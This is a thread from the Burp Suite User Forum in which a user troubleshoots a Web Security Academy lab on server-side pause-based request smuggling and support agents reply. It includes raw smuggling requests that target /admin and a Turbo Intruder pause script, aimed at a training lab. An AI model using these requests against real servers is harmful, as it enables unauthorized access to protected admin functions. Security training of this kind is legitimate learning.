The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum


Server-side pause-based request smuggling ISSUE

Hamza | Last updated: Jul 03, 2024 10:42AM UTC

I run this:

    POST /resources HTTP/1.1
    Host: 0a2200f2043d4f71805fd09600be0071.web-security-academy.net
    Cookie: session=mAbLimPqmVB5vNGU7notqlDu7ZCsW8O4
    Content-Type: application/x-www-form-urlencoded
    Content-Length: CORRECT
    connection: keep-alive

    GET /admin HTTP/1.1
    Host: localhost

    def queueRequests(target, wordlists):
        engine = RequestEngine(endpoint=target.endpoint,
                               concurrentConnections=1,
                               requestsPerConnection=500,
                               pipeline=False
                               )
        # Pause for pauseTime milliseconds after sending the pauseMarker sequence
        engine.queue(target.req, pauseMarker=['\r\n\r\n'], pauseTime=61000)
        engine.queue(target.req)

    def handleResponse(req, interesting):
        table.add(req)

After launching the attack in Turbo I got:

    HTTP/1.1 400 Bad Request
    Content-Type: application/json; charset=utf-8
    X-Content-Type-Options: nosniff
    Server: Apache/2.4.52
    Keep-Alive: timeout=120
    Content-Length: 50

    {"error":"Duplicate header names are not allowed"}

Ben, PortSwigger Agent | Last updated: Jul 03, 2024 01:22PM UTC

Hi Hamza,

Are you able to provide us with a screenshot of the full request that you have configured in Turbo Intruder alongside the Turbo Intruder script that you are running so that we can see this in its entirety?

Hamza | Last updated: Jul 04, 2024 04:59AM UTC

Sure, how can I provide a screenshot, or where can I upload the screenshot? There is no option for uploading a screenshot.

Michelle, PortSwigger Agent | Last updated: Jul 04, 2024 08:02AM UTC

Can you email it to support@portswigger.net and reference this forum post, please?

Hamza | Last updated: Jul 04, 2024 10:58AM UTC

I am running:

    POST /resources HTTP/1.1
    Host: 0a9500d103b3bce3804ce9c5006a0004.web-security-academy.net
    Connection: keep-alive
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 85

    GET /admin/ HTTP/1.1
    Host: 0a9500d103b3bce3804ce9c5006a0004.web-security-academy.net

I got:

    HTTP/1.1 400 Bad Request
    Content-Type: application/json; charset=utf-8
    X-Content-Type-Options: nosniff
    Server: Apache/2.4.52
    Keep-Alive: timeout=120
    Content-Length: 50

    {"error":"Duplicate header names are not allowed"}

Michelle, PortSwigger Agent | Last updated: Jul 04, 2024 12:55PM UTC

Hi,

Thanks for sending us an email. We'll take a look through and check the details of the lab and be in touch soon.

Michelle, PortSwigger Agent | Last updated: Jul 05, 2024 08:21AM UTC